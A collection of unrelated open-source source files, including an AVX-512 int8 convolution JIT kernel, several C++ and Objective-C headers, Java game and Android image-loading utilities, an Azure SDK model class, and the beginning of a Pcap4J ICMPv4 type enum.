<gh_stars>100-1000 #include "saber/funcs/impl/x86/x86_utils.h" #include "saber/funcs/impl/x86/kernel/jit_avx512_core_u8s8s32x_conv_act_pool_kernel.h" namespace anakin { namespace saber { namespace jit { #define GET_OFF(field) offsetof(jit_conv_call_t, field) using namespace Xbyak; static inline void pick_loop_order(jit_conv_conf_t &jcp) { jcp.loop_order = loop_cgn; if (jcp.ngroups > 1) { jcp.loop_order = loop_ngc; } } bool jit_avx512_core_u8s8s32x_conv_act_pool_kernel::maybe_relu(int position, const float *post_sum) { if (position == 0) { /* if do sum, then skip relu before sum */ if (post_sum) { return false; } return false || jcp.with_relu; } else if (position == 1) { /* relu after sum */ if (post_sum == nullptr) { return false; } return false || jcp.dst_dt == AK_UINT8 || jcp.with_relu; } return false; } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::prepare_output(int ur_w) { for (int k = 0; k < jcp.nb_oc_blocking; k++) { for (int j = 0; j < ur_w; j++) { Zmm zmm = zmm_out(j, k); vpxord(zmm, zmm, zmm); } } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::store_unit(DataType type_out, zmm_t zmm_in, int aux_output_offset, bool mask_flag) { auto addr = EVEX_compress_addr(reg_out, aux_output_offset); zmm_t r_zmm = mask_flag ? zmm_in | ktail_mask : zmm_in; switch (type_out) { case AK_FLOAT: case AK_INT32: vmovups(addr, r_zmm); break; case AK_INT8: vpmovsdb(addr, r_zmm); break; case AK_UINT8: vpmovusdb(addr, r_zmm); break; default: assert(!"unknown dst_dt"); } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::cvt2ps(DataType type_in, zmm_t zmm_in, const Xbyak::Operand &op, bool mask_flag) { zmm_t zmm = mask_flag ? zmm_in | ktail_mask | T_z : zmm_in; switch (type_in) { case AK_FLOAT: case AK_INT32: vmovups(zmm, op); break; case AK_INT8: vpmovsxbd(zmm, op); break; case AK_UINT8: vpmovzxbd(zmm, op); break; default: assert(!"unsupported data type"); } if (type_in != AK_FLOAT) { vcvtdq2ps(zmm_in, zmm_in); } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::store_output(int ur_w, int last_oc_block_flag) { int nb_oc_block = jcp.nb_oc_blocking; mov(reg_bias, ptr[param1 + GET_OFF(bias)]); mov(reg_ptr_scales, ptr[param1 + GET_OFF(scales)]); const float *p_sum_scale = nullptr; if (jcp.with_sum) { p_sum_scale = &(jcp.sum_scale); } if (p_sum_scale && *p_sum_scale != 1.f) { mov(reg_ptr_sum_scale, (size_t)p_sum_scale); } vpxord(zmm_zero, zmm_zero, zmm_zero); for (int k = 0; k < nb_oc_block; k++) { const bool mask_flag = last_oc_block_flag == 1 && k == nb_oc_block - 1; int scale_offset = jcp.is_oc_scale * (sizeof(float) * k * jcp.oc_block); auto zmm_bias = zmm_tmp; if (jcp.with_bias) { int bias_offset = jcp.typesize_bia * k * jcp.oc_block; auto bias_addr = EVEX_compress_addr(reg_bias, bias_offset); cvt2ps(jcp.bia_dt, zmm_bias, bias_addr, mask_flag); } for (int j = 0; j < ur_w; j++) { int aux_output_offset = jcp.typesize_out * (k * jcp.oc_block + j * jcp.oc_without_padding * jcp.ngroups); auto addr = EVEX_compress_addr(reg_out, aux_output_offset); Zmm zmm = zmm_out(j, k); vcvtdq2ps (zmm, zmm); if (jcp.with_bias) { vaddps(zmm, zmm, zmm_bias); } zmm_t mask_zmm = mask_flag ? 
zmm | ktail_mask | T_z : zmm; vmulps(mask_zmm, zmm, EVEX_compress_addr(reg_ptr_scales, scale_offset)); if (maybe_relu(0, p_sum_scale)) { vmaxps(zmm, zmm_zero, zmm); } if (p_sum_scale) { // post_op: sum auto zmm_prev_dst = zmm_bcast; cvt2ps(jcp.dst_dt, zmm_prev_dst, addr, mask_flag); if (*p_sum_scale == 1.f) { vaddps(zmm, zmm_prev_dst); } else { vfmadd231ps(zmm, zmm_prev_dst, zword_b[reg_ptr_sum_scale]); } } if (maybe_relu(1, p_sum_scale)) { vmaxps(zmm, zmm_zero, zmm); } if (jcp.dst_dt != AK_FLOAT) { if (jcp.rm == round_mode::nearest) { vcvtps2dq(zmm | T_rn_sae, zmm); } else if (jcp.rm == round_mode::down) { vcvtps2dq(zmm | T_rd_sae, zmm); } else { assert(!"unimplemented"); } } } bool with_partial_pool = jcp.with_partial_pool; if (!with_partial_pool) { for (int j = 0; j < ur_w; j++) { int aux_output_offset = jcp.typesize_out * (k * jcp.oc_block + j * jcp.oc_without_padding * jcp.ngroups); Zmm zmm = zmm_out(j, k); store_unit(jcp.dst_dt, zmm, aux_output_offset, mask_flag); } } else { int pool_w = jcp.pool_kw; int full_size_num = ur_w / pool_w; for (int j = 0; j < full_size_num; j++) { int aux_output_offset = jcp.typesize_out * (k * jcp.oc_block + (j) * jcp.oc_without_padding * jcp.ngroups); Zmm zmm0 = zmm_out(j * pool_w, k); for (int i = 1; i < pool_w; i++) { Zmm zmm1 = zmm_out(j * pool_w + i, k); switch (jcp.pool_alg) { case Pooling_max: vpcmpd(pool_k_cmp_mask, zmm0, zmm1, _cmp_lt_os); vpblendmd(zmm0 | pool_k_cmp_mask, zmm0, zmm1); break; case Pooling_average_include_padding: case Pooling_average_exclude_padding: vpaddd(zmm0, zmm0, zmm1); break; default: assert(!"unimplemented"); } } store_unit(jcp.dst_dt, zmm0, aux_output_offset, mask_flag); } } } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::compute_ker(int ur_w, int pad_l, int pad_r, int last_ic_block_flag) { int kw = jcp.kw; int stride_w = jcp.stride_w; int ic_block = jcp.ic_block; int oc_block = jcp.oc_block; int ch_block_all = jcp.ch_block * ic_block * oc_block; int nb_oc_block = jcp.nb_oc_blocking; Label kh_label; Label skip_kh_loop; int shift_kernel_ptr = jcp.typesize_in * jcp.kw * ch_block_all; int shift_input_ptr = jcp.typesize_in * (jcp.dilate_h + 1) * jcp.iw * jcp.ic_without_padding * jcp.ngroups; auto input_offset = [=](int oi, int ic, int ki) { return jcp.typesize_in * ((ki * (jcp.dilate_w + 1) + oi * stride_w - pad_l) * jcp.ic_without_padding * jcp.ngroups + 4 * ic); }; auto kernel_offset = [=](int ii, int ic, int ki) { return jcp.typesize_in * ((ii * jcp.nb_ic * jcp.kh * jcp.kw + ki) * ch_block_all + 4 * ic * oc_block); }; auto compute = [=](Zmm vreg_acc, Zmm vreg_wei, Zmm vreg_src) { if (jcp.ver == ver_vnni) { // also okay for depthwise since src is zero-extended vpdpbusd(vreg_acc, vreg_src, vreg_wei); } else if (jcp.is_dw) { vpmulld(zmm_tmp, vreg_src, vreg_wei); vpaddd(vreg_acc, vreg_acc, zmm_tmp); } else { vpmaddubsw(zmm_tmp, vreg_src, vreg_wei); vpmaddwd(zmm_tmp, zmm_tmp, zmm_one); vpaddd(vreg_acc, vreg_acc, zmm_tmp); } }; mov(aux_reg_inp, reg_inp); mov(aux_reg_ker, reg_ker); mov(reg_kj, reg_kh); if ((jcp.kh - 1) * (jcp.dilate_h + 1) < std::max(jcp.t_pad, jcp.b_pad)) { cmp(reg_kj, 0); je(skip_kh_loop, T_NEAR); } L(kh_label); { for (int ki = 0; ki < kw; ki++) { int jj_start = get_ow_start(ki, pad_l); int jj_end = get_ow_end(ur_w, ki, pad_r); int tail_size = jcp.ic_without_padding % 4; /* Skip the last loads of input if (ic%16)/4 < ic_block/4 */ int icb = jcp.is_dw ? 1 : (last_ic_block_flag != no_last_block) ? 
utils::div_up((jcp.ic_without_padding % ic_block), 4) : ic_block / 4; for (int ic = 0; ic < icb; ic++) { for (int jj = jj_start; jj < jj_end; jj++) { int aux_input_offset = input_offset(jj, ic, ki); if (jcp.is_dw) { vpmovzxbd(zmm_inp(jj, nb_oc_block), EVEX_compress_addr( aux_reg_inp, aux_input_offset)); } else if (last_ic_block_flag == last_sp_block && tail_size != 0 && ic == icb - 1) { Xmm xmm_tmp = Xmm(zmm_inp(jj, nb_oc_block).getIdx()); for (int r = 0; r < tail_size; ++r) { vpinsrb(xmm_tmp, xmm_tmp, ptr[aux_reg_inp + aux_input_offset + r], r); } vpbroadcastd(zmm_inp(jj, nb_oc_block), xmm_tmp); } else { vpbroadcastd(zmm_inp(jj, nb_oc_block), EVEX_compress_addr(aux_reg_inp, aux_input_offset)); } } for (int ii = 0; ii < nb_oc_block; ii++) { int aux_kernel_offset = kernel_offset(ii, ic, ki); if (jj_end - jj_start > 0) { if (jcp.is_dw) { vpmovsxbd(zmm_wei, EVEX_compress_addr(aux_reg_ker, aux_kernel_offset)); } else { vmovups(zmm_wei, EVEX_compress_addr(aux_reg_ker, aux_kernel_offset)); } } for (int jj = jj_start; jj < jj_end; jj++) { compute(zmm_out(jj, ii), zmm_wei, zmm_inp(jj, nb_oc_block)); } } } } add(aux_reg_ker, shift_kernel_ptr); add(aux_reg_inp, shift_input_ptr); dec(reg_kj); cmp(reg_kj, 0); jg(kh_label, T_NEAR); } L(skip_kh_loop); } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::compute_loop(int ur_w, int pad_l, int pad_r, bool is_last_sp_block) { prepare_output(ur_w); // IC loop Label icb_label; mov(reg_icb, jcp.nb_ic); L(icb_label); if (jcp.ic_without_padding != jcp.ic) { Label common_ker; Label end_ker; cmp(reg_icb, 1); // The last IC block jne(common_ker, T_NEAR); compute_ker(ur_w, pad_l, pad_r, is_last_sp_block ? last_sp_block : last_ic_block); jmp(end_ker, T_NEAR); L(common_ker); compute_ker(ur_w, pad_l, pad_r, no_last_block); L(end_ker); } else { compute_ker(ur_w, pad_l, pad_r, no_last_block); } // End of IC Loop int inp_step = jcp.ic_block; int ker_step = jcp.kh * jcp.kw * jcp.oc_block * jcp.ic_block; add(reg_inp, jcp.typesize_in * inp_step); add(reg_ker, jcp.typesize_in * ker_step); dec(reg_icb); cmp(reg_icb, 0); jg(icb_label, T_NEAR); sub(reg_inp, jcp.typesize_in * inp_step * jcp.nb_ic); sub(reg_ker, jcp.typesize_in * ker_step * jcp.nb_ic); if (jcp.ngroups % jcp.ch_block != 0 || jcp.oc_without_padding != jcp.oc) { Label common_store; Label end_store; if (jcp.is_dw) { cmp(reg_oc_blocks, jcp.nb_ch - 1); } else { cmp(reg_oc_blocks, jcp.nb_oc - jcp.nb_oc_blocking); } jne(common_store, T_NEAR); store_output(ur_w, 1); jmp(end_store, T_NEAR); L(common_store); store_output(ur_w, 0); L(end_store); } else { store_output(ur_w, 0); } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::generate() { int inp_shift_pad = jcp.typesize_in * (jcp.ur_w * jcp.stride_w - jcp.l_pad) * jcp.ic_without_padding * jcp.ngroups; int inp_shift = jcp.typesize_in * (jcp.ur_w * jcp.stride_w * jcp.ic_without_padding * jcp.ngroups); int out_shift = jcp.typesize_out * (jcp.ur_w * jcp.oc_without_padding * jcp.ngroups); if (jcp.with_partial_pool) { out_shift = jcp.typesize_out * ((jcp.ur_w / jcp.pool_kw) * jcp.oc_without_padding * jcp.ngroups); } preamble(); xor_(reg_scratch, reg_scratch); Reg16 _t = reg_scratch.cvt16(); mov(_t, 0x1); vpbroadcastw(zmm_one, _t); mov(reg_inp, ptr[param1 + GET_OFF(src)]); mov(reg_out, ptr[param1 + GET_OFF(dst)]); mov(reg_ker, ptr[param1 + GET_OFF(filt)]); mov(reg_kh, ptr[param1 + GET_OFF(kh_padding)]); if (jcp.ngroups % jcp.ch_block != 0 || jcp.oc_without_padding != jcp.oc) { int tail_size = jcp.is_dw ? 
jcp.ngroups % jcp.ch_block : jcp.oc_without_padding % jcp.oc_block; int mask = (1 << tail_size) - 1; mov(reg_oc_blocks, ptr[param1 + GET_OFF(oc_blocks)]); Reg32 regw_tmp = reg_oi.cvt32(); mov(regw_tmp, mask); kmovw(ktail_mask, regw_tmp); } int r_pad = std::max(0, (jcp.ow - 1) * jcp.stride_w + (jcp.kw - 1) * (jcp.dilate_w + 1) - (jcp.iw + jcp.l_pad - 1)); int n_oi = jcp.ow / jcp.ur_w; int r_pad1 = (jcp.ur_w * n_oi - 1) * jcp.stride_w + (jcp.kw - 1) * (jcp.dilate_w + 1) - (jcp.iw + jcp.l_pad - 1); if (r_pad1 > 0 || jcp.ur_w_tail == 0) { n_oi--; } xor_(reg_oi, reg_oi); if (jcp.ow == jcp.ur_w) { compute_loop(jcp.ur_w, jcp.l_pad, r_pad, true); } else { if (n_oi == 0) { compute_loop(jcp.ur_w, jcp.l_pad, r_pad1, jcp.ur_w_tail == 0); add(reg_inp, inp_shift_pad); add(reg_out, out_shift); if (jcp.ur_w_tail != 0) { compute_loop(jcp.ur_w_tail, 0, r_pad, true); } } else { if (jcp.l_pad > 0) { compute_loop(jcp.ur_w, jcp.l_pad, 0, false); add(reg_inp, inp_shift_pad); add(reg_out, out_shift); inc(reg_oi); } if ((jcp.l_pad <= 0 && n_oi > 0) || (jcp.l_pad > 0 && n_oi > 1)) { Label ow_loop_label; L(ow_loop_label); { compute_loop(jcp.ur_w, 0, 0, false); add(reg_inp, inp_shift); add(reg_out, out_shift); inc(reg_oi); cmp(reg_oi, n_oi); jl(ow_loop_label, T_NEAR); } } if (r_pad1 > 0 || jcp.ur_w_tail == 0) { compute_loop(jcp.ur_w, 0, r_pad1, jcp.ur_w_tail == 0); add(reg_inp, inp_shift); add(reg_out, out_shift); } if (jcp.ur_w_tail != 0) { compute_loop(jcp.ur_w_tail, 0, r_pad, true); } } } postamble(); } SaberStatus jit_avx512_core_u8s8s32x_conv_act_pool_kernel::init_conf(jit_conv_conf_t &jcp) { SaberStatus ret = SaberUnImplError; const int regs = 28; // TODO /* if (!(mayiuse(avx512_core) && src_d.data_type() == data_type::u8 && weights_d.data_type() == data_type::s8 && one_of(dst_d.data_type(), data_type::f32, data_type::s32, data_type::s8, data_type::u8))) return status::unimplemented; if (!implication(with_relu, relu_negative_slope == 0.)) return status::unimplemented; */ using namespace utils; if (jcp.is_dw) { jcp.ch_block = 16; jcp.ic_block = 1; jcp.oc_block = 1; if (jcp.ngroups % jcp.ch_block != 0) { return ret; } } else { jcp.ch_block = 1; jcp.ic_block = 16; jcp.oc_block = 16; if (jcp.ngroups == 1) { jcp.oc = rnd_up(jcp.oc, jcp.oc_block); jcp.ic = rnd_up(jcp.ic, jcp.ic_block); } if (jcp.ic % jcp.ic_block != 0) { return ret; } } jcp.ver = ver_avx512_core; if (mayiuse(avx512_core_vnni)) { jcp.ver = ver_vnni; } /*TOTO const auto w_format = with_groups ? (jcp.is_dw ? Goihw16g : gOIhw4i16o4i) : OIhw4i16o4i; if (weights_d.format() == any) CHECK(weights_pd.set_format(w_format)); if (weights_d.format() != w_format) return status::unimplemented; if (dst_d.format() == any) CHECK(dst_pd.set_format(nhwc)); if (dst_d.format() != nhwc) return status::unimplemented; if (src_d.format() == any) CHECK(src_pd.set_format(nhwc)); if (src_d.format() != nhwc) return status::unimplemented; if (jcp.with_bias) { if (bias_d.format() == any) CHECK(bias_pd.set_format(x)); if (bias_d.format() != x) return status::unimplemented; } jcp.bia_dt = jcp.with_bias ? cd.bias_desc.data_type : data_type::undef; jcp.dst_dt = cd.dst_desc.data_type; jcp.typesize_in = types::data_type_size(src_d.data_type()); jcp.typesize_out = types::data_type_size(dst_d.data_type()); jcp.typesize_acc = sizeof(int32_t); jcp.typesize_bia = jcp.with_bias ? types::data_type_size(bias_d.data_type()) : 0; */ jcp.typesize_in = 1; jcp.typesize_out = datatype_size(jcp.dst_dt); jcp.typesize_bia = jcp.with_bias ? 
datatype_size(jcp.bia_dt) : 0; jcp.nb_ch = div_up(jcp.ngroups, jcp.ch_block); jcp.nb_ic = jcp.ic / jcp.ic_block; jcp.nb_oc = jcp.oc / jcp.oc_block; // If OC blocking is incommensurate with the number of OC blocks (general // requirement for all convolutions), or if it results in an unrolling // factor smaller than the left padding (special requirement for SSD:fc6), // then search for a smaller OC blocking that satisfies both constraints. jcp.nb_oc_blocking = std::min(4, jcp.nb_oc); for (; jcp.nb_oc_blocking > 1; jcp.nb_oc_blocking--) { if (jcp.nb_oc % jcp.nb_oc_blocking == 0 && jcp.l_pad <= regs / (jcp.nb_oc_blocking + 1)) { break; } } jcp.ur_w = regs / (jcp.nb_oc_blocking + 1); if (jcp.ur_w % jcp.pool_kw) jcp.ur_w = (jcp.ur_w / jcp.pool_kw) * jcp.pool_kw; if (jcp.ow < jcp.ur_w) { jcp.ur_w = jcp.ow; } jcp.ur_w_tail = jcp.ow % jcp.ur_w; bool args_ok = true && jcp.oc % jcp.oc_block == 0 && jcp.ur_w != 0 && jcp.ur_w_tail % jcp.pool_kw == 0 && jcp.l_pad <= jcp.ur_w && implication(!jcp.is_1stconv, jcp.ic % jcp.ic_block == 0); if (!args_ok) { return ret; } int r_pad_no_tail = std::max(0, (jcp.ow - jcp.ur_w_tail - 1) * jcp.stride_w + (jcp.kw - 1) * (jcp.dilate_w + 1) - (jcp.iw + jcp.l_pad - 1)); if (r_pad_no_tail > jcp.ur_w) { return ret; } pick_loop_order(jcp); jcp.nb_ic_L2 = jcp.nb_ic; jcp.is_oc_scale = 1; /* TODO const auto &oscales = attr.output_scales_; jcp.is_oc_scale = oscales.mask_ == 1 << 1; assert(utils::implication(!jcp.is_oc_scale, oscales.mask_ == 0)); */ return SaberSuccess; } } // namespace jit } // namespace saber } // namespace anakin // vim: et ts=4 sw=4 cindent cino^=l0,\:0,N-s
12,689
3,366
#ifndef _NOTQUERY_H #define _NOTQUERY_H #include<memory> using std::shared_ptr; #include<string> using std::string; #include"query.h" #include"query_base.h" class QueryResult; class TextQuery; class NotQuery :public Query_base { friend Query operator~(const Query&); //call Query's default copy constructor. NotQuery(const Query &q) :query(q){} string rep() const{ return "~(" + query.rep() + ")"; } QueryResult eval(const TextQuery&) const; Query query; }; inline Query operator~(const Query &operand) { return shared_ptr<Query_base>(new NotQuery(operand)); } #endif
206
1,341
<filename>ObjcExample/ObjcExample/Demo/GKPageScrollView/网易云音乐/GKWYHeaderView.h // // GKWYHeaderView.h // GKPageScrollView // // Created by QuintGao on 2018/10/28. // Copyright © 2018 QuintGao. All rights reserved. // #import <UIKit/UIKit.h> NS_ASSUME_NONNULL_BEGIN #define kWYHeaderHeight (kScreenW * 500.0f / 750.0f - kNavBarHeight) @interface GKWYHeaderView : UIView @property (nonatomic, strong) UILabel *nameLabel; @end NS_ASSUME_NONNULL_END
211
2,226
#pragma once #ifndef ES_APP_GUIS_GUI_GENERAL_SCREENSAVER_OPTIONS_H #define ES_APP_GUIS_GUI_GENERAL_SCREENSAVER_OPTIONS_H #include "GuiScreensaverOptions.h" class GuiGeneralScreensaverOptions : public GuiScreensaverOptions { public: GuiGeneralScreensaverOptions(Window* window, const char* title); virtual ~GuiGeneralScreensaverOptions(); private: void openVideoScreensaverOptions(); void openSlideshowScreensaverOptions(); }; #endif // ES_APP_GUIS_GUI_GENERAL_SCREENSAVER_OPTIONS_H
183
1,025
package org.menacheri.zombie.domain; import org.menacheri.jetserver.app.GameRoom; import org.menacheri.jetserver.app.Task; import org.menacheri.jetserver.communication.DeliveryGuaranty.DeliveryGuarantyOptions; import org.menacheri.jetserver.communication.NettyMessageBuffer; import org.menacheri.jetserver.event.Events; import org.menacheri.jetserver.event.NetworkEvent; import org.menacheri.jetserver.protocols.impl.WebSocketProtocol; import org.menacheri.zombie.game.Messages; public class WorldMonitor implements Task { private World world; private GameRoom room; private Object id; public WorldMonitor(World world, GameRoom room) { this.world = world; this.room = room; } public World getWorld() { return world; } public void setWorld(World world) { this.world = world; } @Override public Object getId() { return id; } @Override public void run() { if(world.apocalypse()) { // Send it to all players System.out.println("Apocalypse is here"); NetworkEvent networkEvent = Events.networkEvent(Messages.apocalypse()); room.sendBroadcast(networkEvent); } else { NetworkEvent networkEvent = null; if(room.getProtocol() instanceof WebSocketProtocol) { networkEvent = Events.networkEvent(world.getAlive()); } else { NettyMessageBuffer buffer = new NettyMessageBuffer(); buffer.writeInt(world.getAlive()); networkEvent = Events.networkEvent(buffer,DeliveryGuarantyOptions.FAST); } room.sendBroadcast(networkEvent); } world.report(); } @Override public void setId(Object id) { this.id = id; } public GameRoom getRoom() { return room; } public void setRoom(GameRoom room) { this.room = room; } }
637
903
<gh_stars>100-1000 #include "../../src/corelib/kernel/qfunctions_wince.h"
32
681
<reponame>nahimr/REDRIVER2 enum GameStates { STATE_NONE = 0, STATE_INITFRONTEND, STATE_FRONTEND, STATE_GAMESTART, STATE_GAMELAUNCH, // launch single game STATE_LADDER, // launch a mission ladder STATE_GAMEINIT, STATE_GAMELOOP, STATE_GAMECOMPLETE, STATE_FMVPLAY, }; // changes the state extern void SetState(GameStates newState, void* param = NULL); // does the state loop extern void DoStateLoop();
165
14,668
// Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_BROWSER_FONT_ACCESS_FONT_ENUMERATION_CACHE_WIN_H_ #define CONTENT_BROWSER_FONT_ACCESS_FONT_ENUMERATION_CACHE_WIN_H_ #include <dwrite.h> #include <stdint.h> #include <wrl/client.h> #include <map> #include <memory> #include <string> #include "base/memory/read_only_shared_memory_region.h" #include "base/sequence_checker.h" #include "base/synchronization/atomic_flag.h" #include "base/thread_annotations.h" #include "base/types/pass_key.h" #include "content/browser/font_access/font_enumeration_cache.h" #include "content/common/content_export.h" #include "third_party/abseil-cpp/absl/types/optional.h" #include "third_party/blink/public/common/font_access/font_enumeration_table.pb.h" namespace content { // Windows implementation of FontEnumerationCache. // Calls DirectWrite font APIs. Requires Windows 7 with KB2670838 and newer. class CONTENT_EXPORT FontEnumerationCacheWin : public FontEnumerationCache { public: // The constructor is public for internal use of base::SequenceBound. // // Production code should call FontEnumerationCache::Create(). Testing code // should call FontEnumerationCache::CreateForTesting(). FontEnumerationCacheWin(absl::optional<std::string> locale_override, base::PassKey<FontEnumerationCache>); FontEnumerationCacheWin(const FontEnumerationCacheWin&) = delete; FontEnumerationCacheWin& operator=(const FontEnumerationCacheWin&) = delete; ~FontEnumerationCacheWin() override; // A data structure to hold font family results from DirectWrite. struct FamilyDataResult { std::vector<blink::FontEnumerationTable_FontMetadata> fonts; FamilyDataResult(); FamilyDataResult(const FamilyDataResult&) = delete; FamilyDataResult& operator=(const FamilyDataResult&) = delete; ~FamilyDataResult(); }; protected: // FontEnumerationCache: blink::FontEnumerationTable ComputeFontEnumerationData( const std::string& locale) override; private: void PrepareFontEnumerationCache(); SEQUENCE_CHECKER(sequence_checker_); }; } // namespace content #endif // CONTENT_BROWSER_FONT_ACCESS_FONT_ENUMERATION_CACHE_WIN_H_
771
1,350
// Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.hdinsight.models; import com.azure.core.annotation.Fluent; import com.azure.core.util.logging.ClientLogger; import com.fasterxml.jackson.annotation.JsonIgnore; import com.fasterxml.jackson.annotation.JsonProperty; /** The SSH public key for the cluster nodes. */ @Fluent public final class SshPublicKey { @JsonIgnore private final ClientLogger logger = new ClientLogger(SshPublicKey.class); /* * The certificate for SSH. */ @JsonProperty(value = "certificateData") private String certificateData; /** * Get the certificateData property: The certificate for SSH. * * @return the certificateData value. */ public String certificateData() { return this.certificateData; } /** * Set the certificateData property: The certificate for SSH. * * @param certificateData the certificateData value to set. * @return the SshPublicKey object itself. */ public SshPublicKey withCertificateData(String certificateData) { this.certificateData = certificateData; return this; } /** * Validates the instance. * * @throws IllegalArgumentException thrown if the instance is not valid. */ public void validate() { } }
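A minimal usage sketch of the fluent setter above; the key string is a placeholder, not real key material:

SshPublicKey key = new SshPublicKey()
    .withCertificateData("ssh-rsa AAAAB3... placeholder-key user@host");
String data = key.certificateData(); // returns the value set above
key.validate();                      // no constraints to check, as defined above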
485
757
'''Initialization'''
from .videoplayer import VideoPlayer
20
1,615
// // MLNGalleryNavigatorView.h // MLN_Example // // Created by MOMO on 2019/11/7. // Copyright © 2019年 MoMo. All rights reserved. // #import <UIKit/UIKit.h> #define kMLNNavigatorHeight 55 NS_ASSUME_NONNULL_BEGIN @interface MLNGalleryNavigationBarItem : NSObject @property (nonatomic, copy) UIImage *image; @property (nonatomic, copy) dispatch_block_t clickActionBlock; @end @interface MLNGalleryNavigationBar : UIView - (void)setLeftItem:(MLNGalleryNavigationBarItem *)leftItem; - (void)setRightItem:(MLNGalleryNavigationBarItem *)rightItem; - (void)setRightItems:(NSArray <MLNGalleryNavigationBarItem *> *)rightItems; - (void)setTitleView:(UIView *)titleView; - (void)setTitle:(NSString *)title; - (void)setMsgNumber:(NSInteger)count; - (UILabel *)defaultTitleLabel; - (UIButton *)rightButtonAtIndex:(NSInteger)index; @end NS_ASSUME_NONNULL_END
310
336
package me.saket.dank.utils.glide; import androidx.annotation.Nullable; import com.bumptech.glide.load.DataSource; import com.bumptech.glide.load.engine.GlideException; import com.bumptech.glide.request.RequestListener; import com.bumptech.glide.request.target.Target; import io.reactivex.exceptions.Exceptions; import io.reactivex.functions.Consumer; import timber.log.Timber; /** * Utility methods related to Glide. */ public class GlideUtils { public static class LambdaRequestListener<R> implements RequestListener<R> { private final Consumer<R> resourceConsumer; private final Consumer<Exception> errorConsumer; public LambdaRequestListener(Consumer<R> resource, Consumer<Exception> error) { this.resourceConsumer = resource; this.errorConsumer = error; } @Override public final boolean onResourceReady(R resource, Object model, Target<R> target, DataSource dataSource, boolean isFirstResource) { try { resourceConsumer.accept(resource); } catch (Exception e) { throw Exceptions.propagate(e); } return false; } @Override public final boolean onLoadFailed(@Nullable GlideException e, Object model, Target<R> target, boolean isFirstResource) { try { errorConsumer.accept(e); } catch (Exception anotherE) { throw Exceptions.propagate(anotherE); } return false; } } public abstract static class SimpleRequestListener<R> implements RequestListener<R> { @Override public final boolean onLoadFailed(@Nullable GlideException e, Object model, Target<R> target, boolean isFirstResource) { onLoadFailed(e); return false; } @Override public final boolean onResourceReady(R resource, Object model, Target<R> target, DataSource dataSource, boolean isFirstResource) { onResourceReady(resource); return false; } public void onResourceReady(R resource) {} public void onLoadFailed(@Nullable Exception e) { if (e != null) { e.printStackTrace(); } else { Timber.e("Couldn't load resourceConsumer"); } } } }
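A short sketch of plugging the LambdaRequestListener above into a Glide load. The URL and the enclosing method are made up, and the request-builder chain assumes the usual Glide 4 API (Glide.with(...).load(...).listener(...).into(...)); adjust to the actual call sites in the app:

// Assumes: import com.bumptech.glide.Glide; import com.bumptech.glide.request.RequestListener;
// import android.graphics.drawable.Drawable; import android.widget.ImageView;
// plus the Timber import already used above.
static void loadWithLogging(ImageView imageView) {
    RequestListener<Drawable> listener = new GlideUtils.LambdaRequestListener<Drawable>(
        drawable -> Timber.i("loaded: %s", drawable),   // resourceConsumer
        error -> Timber.e(error, "load failed"));       // errorConsumer

    Glide.with(imageView)
        .load("https://example.com/image.png")          // hypothetical URL
        .listener(listener)
        .into(imageView);
}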
747
973
<reponame>bcaglayan/pcap4j<gh_stars>100-1000 /*_########################################################################## _## _## Copyright (C) 2012-2015 Pcap4J.org _## _########################################################################## */ package org.pcap4j.packet.namednumber; import java.util.HashMap; import java.util.Map; /** * ICMPv4 Type * * @see <a * href="http://www.iana.org/assignments/icmp-parameters/icmp-parameters.xml#icmp-parameters-types">IANA * Registry</a> * @author <NAME> * @since pcap4j 0.9.11 */ public final class IcmpV4Type extends NamedNumber<Byte, IcmpV4Type> { /** */ private static final long serialVersionUID = -6737808159892354431L; /** Echo Reply: 0 */ public static final IcmpV4Type ECHO_REPLY = new IcmpV4Type((byte) 0, "Echo Reply"); /** Destination Unreachable: 3 */ public static final IcmpV4Type DESTINATION_UNREACHABLE = new IcmpV4Type((byte) 3, "Destination Unreachable"); /** Source Quench: 4 */ public static final IcmpV4Type SOURCE_QUENCH = new IcmpV4Type((byte) 4, "Source Quench"); /** Redirect: 5 */ public static final IcmpV4Type REDIRECT = new IcmpV4Type((byte) 5, "Redirect"); /** Alternate Host Address: 6 */ public static final IcmpV4Type ALTERNATE_HOST_ADDRESS = new IcmpV4Type((byte) 6, "Alternate Host Address"); /** Echo: 8 */ public static final IcmpV4Type ECHO = new IcmpV4Type((byte) 8, "Echo"); /** Router Advertisement: 9 */ public static final IcmpV4Type ROUTER_ADVERTISEMENT = new IcmpV4Type((byte) 9, "Router Advertisement"); /** Router Solicitation: 10 */ public static final IcmpV4Type ROUTER_SOLICITATION = new IcmpV4Type((byte) 10, "Router Solicitation"); /** Time Exceeded: 11 */ public static final IcmpV4Type TIME_EXCEEDED = new IcmpV4Type((byte) 11, "Time Exceeded"); /** Parameter Problem: 12 */ public static final IcmpV4Type PARAMETER_PROBLEM = new IcmpV4Type((byte) 12, "Parameter Problem"); /** Timestamp: 13 */ public static final IcmpV4Type TIMESTAMP = new IcmpV4Type((byte) 13, "Timestamp"); /** Timestamp Reply: 14 */ public static final IcmpV4Type TIMESTAMP_REPLY = new IcmpV4Type((byte) 14, "Timestamp Reply"); /** Information Request: 15 */ public static final IcmpV4Type INFORMATION_REQUEST = new IcmpV4Type((byte) 15, "Information Request"); /** Information Reply: 16 */ public static final IcmpV4Type INFORMATION_REPLY = new IcmpV4Type((byte) 16, "Information Reply"); /** Address Mask Request: 17 */ public static final IcmpV4Type ADDRESS_MASK_REQUEST = new IcmpV4Type((byte) 17, "Address Mask Request"); /** Address Mask Reply: 18 */ public static final IcmpV4Type ADDRESS_MASK_REPLY = new IcmpV4Type((byte) 18, "Address Mask Reply"); /** Traceroute: 30 */ public static final IcmpV4Type TRACEROUTE = new IcmpV4Type((byte) 30, "Traceroute"); /** Datagram Conversion Error: 31 */ public static final IcmpV4Type DATAGRAM_CONVERSION_ERROR = new IcmpV4Type((byte) 31, "Datagram Conversion Error"); /** Mobile Host Redirect: 32 */ public static final IcmpV4Type MOBILE_HOST_REDIRECT 